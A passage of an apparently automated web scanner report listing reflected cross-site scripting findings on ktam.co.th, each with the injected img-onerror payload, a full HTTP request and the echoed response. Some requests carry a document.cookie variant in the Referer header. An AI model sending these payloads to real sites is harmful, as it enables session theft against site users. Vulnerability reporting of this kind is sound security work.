<a href="../th/p_line001.gif63aa2\"><img src=a onerror=alert(1)>b83b3ad0258" title="THAI">
...[SNIP]...

5.121. http://www.ktam.co.th/en/index.php/ims/p_line002.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_line002.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c5d3"><img%20src%3da%20onerror%3dalert(1)>ea9b8f98879 was submitted in the REST URL parameter 4. This input was echoed as 8c5d3\"><img src=a onerror=alert(1)>ea9b8f98879 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_line002.gif8c5d3"><img%20src%3da%20onerror%3dalert(1)>ea9b8f98879 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:25 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29526

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_line002.gif8c5d3\"><img src=a onerror=alert(1)>ea9b8f98879" title="THAI">
...[SNIP]...

5.122. http://www.ktam.co.th/en/index.php/ims/p_link01.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link01.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ec99"><img%20src%3da%20onerror%3dalert(1)>46d62b730f9 was submitted in the REST URL parameter 4. This input was echoed as 1ec99\"><img src=a onerror=alert(1)>46d62b730f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_link01.gif1ec99"><img%20src%3da%20onerror%3dalert(1)>46d62b730f9 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:05 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_link01.gif1ec99\"><img src=a onerror=alert(1)>46d62b730f9" title="THAI">
...[SNIP]...

5.123. http://www.ktam.co.th/en/index.php/ims/p_link02.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link02.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9eae1"><img%20src%3da%20onerror%3dalert(1)>85753e23ea8 was submitted in the REST URL parameter 4. This input was echoed as 9eae1\"><img src=a onerror=alert(1)>85753e23ea8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_link02.gif9eae1"><img%20src%3da%20onerror%3dalert(1)>85753e23ea8 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:02 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_link02.gif9eae1\"><img src=a onerror=alert(1)>85753e23ea8" title="THAI">
...[SNIP]...

5.124. http://www.ktam.co.th/en/index.php/ims/p_link03.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link03.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ce72"><img%20src%3da%20onerror%3dalert(1)>42cb58bdd30 was submitted in the REST URL parameter 4. This input was echoed as 4ce72\"><img src=a onerror=alert(1)>42cb58bdd30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_link03.gif4ce72"><img%20src%3da%20onerror%3dalert(1)>42cb58bdd30 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:10 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_link03.gif4ce72\"><img src=a onerror=alert(1)>42cb58bdd30" title="THAI">
...[SNIP]...

5.125. http://www.ktam.co.th/en/index.php/ims/p_link04.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link04.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74f30"><img%20src%3da%20onerror%3dalert(1)>1a261ced02e was submitted in the REST URL parameter 4. This input was echoed as 74f30\"><img src=a onerror=alert(1)>1a261ced02e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_link04.gif74f30"><img%20src%3da%20onerror%3dalert(1)>1a261ced02e HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:02 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_link04.gif74f30\"><img src=a onerror=alert(1)>1a261ced02e" title="THAI">
...[SNIP]...

5.126. http://www.ktam.co.th/en/index.php/ims/p_link05.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link05.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54ff0"><img%20src%3da%20onerror%3dalert(1)>41c460870d1 was submitted in the REST URL parameter 4. This input was echoed as 54ff0\"><img src=a onerror=alert(1)>41c460870d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_link05.gif54ff0"><img%20src%3da%20onerror%3dalert(1)>41c460870d1 HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:08 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_link05.gif54ff0\"><img src=a onerror=alert(1)>41c460870d1" title="THAI">
...[SNIP]...

5.127. http://www.ktam.co.th/en/index.php/ims/p_link06.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_link06.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2c3a6"><img%20src%3da%20onerror%3dalert(1)>df9bb2914aa was submitted in the REST URL parameter 4. This input was echoed as 2c3a6\"><img src=a onerror=alert(1)>df9bb2914aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_link06.gif2c3a6"><img%20src%3da%20onerror%3dalert(1)>df9bb2914aa HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:28:07 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_link06.gif2c3a6\"><img src=a onerror=alert(1)>df9bb2914aa" title="THAI">
...[SNIP]...

5.128. http://www.ktam.co.th/en/index.php/ims/p_logo1.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_logo1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97605"><img%20src%3da%20onerror%3dalert(1)>a410ae3e2e4 was submitted in the REST URL parameter 4. This input was echoed as 97605\"><img src=a onerror=alert(1)>a410ae3e2e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_logo1.gif97605"><img%20src%3da%20onerror%3dalert(1)>a410ae3e2e4 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:58 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_logo1.gif97605\"><img src=a onerror=alert(1)>a410ae3e2e4" title="THAI">
...[SNIP]...

5.129. http://www.ktam.co.th/en/index.php/ims/p_word1.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/ims/p_word1.gif

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 819a5"><img%20src%3da%20onerror%3dalert(1)>8e9776f713f was submitted in the REST URL parameter 4. This input was echoed as 819a5\"><img src=a onerror=alert(1)>8e9776f713f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/ims/p_word1.gif819a5"><img%20src%3da%20onerror%3dalert(1)>8e9776f713f HTTP/1.1
Host: www.ktam.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:56 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/p_word1.gif819a5\"><img src=a onerror=alert(1)>8e9776f713f" title="THAI">
...[SNIP]...

5.130. http://www.ktam.co.th/en/index.php/media_box.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/media_box.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fb33"><img%20src%3da%20onerror%3dalert(1)>40630af8d34 was submitted in the REST URL parameter 3. This input was echoed as 3fb33\"><img src=a onerror=alert(1)>40630af8d34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/media_box.php3fb33"><img%20src%3da%20onerror%3dalert(1)>40630af8d34 HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:46:00 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29524

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/media_box.php3fb33\"><img src=a onerror=alert(1)>40630af8d34" title="THAI">
...[SNIP]...

5.131. http://www.ktam.co.th/en/index.php/media_box.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/media_box.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61746"><img%20src%3da%20onerror%3dalert(1)>750ab4d0afe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61746\"><img src=a onerror=alert(1)>750ab4d0afe in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/media_box.php/61746"><img%20src%3da%20onerror%3dalert(1)>750ab4d0afe HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:41:07 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29511

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/61746\"><img src=a onerror=alert(1)>750ab4d0afe" title="THAI">
...[SNIP]...

5.132. http://www.ktam.co.th/en/index.php/news.inc.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/news.inc.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16f4c"><img%20src%3da%20onerror%3dalert(1)>e13d7efc859 was submitted in the REST URL parameter 3. This input was echoed as 16f4c\"><img src=a onerror=alert(1)>e13d7efc859 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/news.inc.php16f4c"><img%20src%3da%20onerror%3dalert(1)>e13d7efc859 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:27:08 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29525

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/news.inc.php16f4c\"><img src=a onerror=alert(1)>e13d7efc859" title="THAI">
...[SNIP]...

5.133. http://www.ktam.co.th/en/index.php/news.inc.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/news.inc.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ada8"><img%20src%3da%20onerror%3dalert(1)>159820e6735 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5ada8\"><img src=a onerror=alert(1)>159820e6735 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/news.inc.php/5ada8"><img%20src%3da%20onerror%3dalert(1)>159820e6735 HTTP/1.1
Host: www.ktam.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktam.co.th/en/index.php/ba2b9%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.cookie)%3Eaf4f8f44d0f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=1aec5534a5f0351c6a392c8b01d82142

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:26:47 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
X-Powered-By: PHP/4.4.7
Connection: close
Content-Type: text/html
Content-Length: 29513

<script type="text/javascript">

           var newwindow;

           function poptastic(url)

           {

               newwindow=window.open(url,'name','height=752,width=564');

               if (window.focus) {newwindow.focus()}

           }

       
...[SNIP]...
<a href="../th/5ada8\"><img src=a onerror=alert(1)>159820e6735" title="THAI">
...[SNIP]...

5.134. http://www.ktam.co.th/en/index.php/news.php [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /en/index.php/news.php

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5a99"><img%20src%3da%20onerror%3dalert(1)>0012edab763 was submitted in the REST URL parameter 3. This input was echoed as f5a99\"><img src=a onerror=alert(1)>0012edab763 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /en/index.php/news.phpf5a99"><img%20src%3da%20onerror%3dalert(1)>0012edab763 HTTP/1.1
Host: www.ktam.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=3b7ee77d888366dba59cfd0298d0cdc0;

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:45:25 GMT
